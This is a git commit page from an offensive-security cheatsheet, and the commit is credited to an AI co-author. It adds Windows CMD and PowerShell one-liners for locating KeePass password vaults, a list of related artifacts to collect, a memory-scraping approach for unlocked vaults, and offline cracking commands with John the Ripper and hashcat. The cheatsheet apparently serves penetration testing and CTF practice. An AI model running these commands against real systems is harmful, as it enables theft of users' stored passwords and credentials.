daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

commit 649ce0747272850e9e39961d03482817c8b934b4
parent 644453394b6a963663c140e879bc5598b8aaa556
Author: $: DAΞMON <zer0sec.xp@icloud.com>
Date:   Thu, 17 Sep 2026 00:27:43 +0100

Add KeePass vault discovery commands to Windows credential hunting

Adds CMD and PowerShell one-liners for locating .kdbx files, related
artifacts to grab alongside a found vault, and offline cracking steps.

Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>

Diffstat:
Msrc/content/sheets/password-attacks/windows-credential-flag-hunting.md | 30++++++++++++++++++++++++++++++
1 file changed, 30 insertions(+), 0 deletions(-)

diff --git a/src/content/sheets/password-attacks/windows-credential-flag-hunting.md b/src/content/sheets/password-attacks/windows-credential-flag-hunting.md @@ -169,6 +169,36 @@ gci C:\Users -Recurse -Include *.rdp -EA 0 # saved RDP pr gci $env:USERPROFILE\.aws\credentials,$env:USERPROFILE\.ssh\* -EA 0 ``` +**Finding KeePass vaults — CMD** +```cmd +dir /s /b C:\*.kdbx +where /r C:\ *.kdbx +dir /s /b %USERPROFILE%\*.kdbx +``` + +**Finding KeePass vaults — PowerShell** +```powershell +Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -EA 0 +Get-ChildItem -Path C:\Users -Include *.kdbx,*.kdb -File -Recurse -EA 0 | + Select-Object FullName, LastWriteTime + +# KeePass config often leaks the key-file path or an auto-open DB path +Get-ChildItem -Path C:\Users -Include KeePass.config.xml -File -Recurse -EA 0 +``` + +**Related artifacts worth grabbing alongside the `.kdbx`** +- `KeePass.config.xml` — may reference a key-file path or an auto-open DB +- `*.key` files near the vault — possible key-file auth component +- Live `KeePass.exe` process — memory can be scraped for the unlocked DB (e.g. `KeePassDumpFull`, or a mimikatz-style memory dump) +- `%APPDATA%\Microsoft\Windows\Recent\` — shortcuts (`.lnk`) that reference a `.kdbx` path even if the vault itself has moved + +**Offline cracking** +```bash +keepass2john vault.kdbx > hash.txt +john hash.txt +# or: hashcat -m 13400 hash.txt wordlist.txt +``` + --- ## Phase 5 — SAM / LSASS / DPAPI (local admin required)